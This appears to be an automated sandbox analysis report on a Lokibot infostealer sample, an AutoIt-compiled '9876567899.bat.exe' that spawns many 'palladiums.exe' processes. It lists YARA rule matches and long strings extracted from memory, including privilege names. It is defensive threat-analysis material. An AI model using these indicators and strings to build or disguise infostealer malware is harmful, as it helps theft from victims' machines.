Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.2327988007.0000000004130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.2236955470.0000000003990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.2264698232.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2170279455.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.2377520077.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000021.00000002.2361952100.0000000001670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2219587145.0000000001830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: palladiums.exe PID: 7092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7220, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7276, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7432, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7544, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7576, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7600, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7620, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7672, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7696, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7716, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7736, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7760, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7780, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7820, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: palladiums.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: 9876567899.bat.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 9876567899.bat.exe, 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_26ad66ae-1
Source: 9876567899.bat.exe, 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_610ff32f-0
Source: 9876567899.bat.exe, 00000000.00000003.2014356623.0000000003BD1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_baf314ab-8
Source: 9876567899.bat.exe, 00000000.00000003.2014356623.0000000003BD1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_4502bc17-2
Source: palladiums.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: palladiums.exe, 00000002.00000000.2014682434.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f969af28-2
Source: palladiums.exe, 00000002.00000000.2014682434.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b7f6e7c3-7
Source: palladiums.exe, 00000009.00000000.2145805899.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f30205fa-3
Source: palladiums.exe, 00000009.00000000.2145805899.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_efd5f7cf-d
Source: palladiums.exe, 0000000B.00000000.2155244137.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c02c83fa-7
Source: palladiums.exe, 0000000B.00000000.2155244137.00000000000F2000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 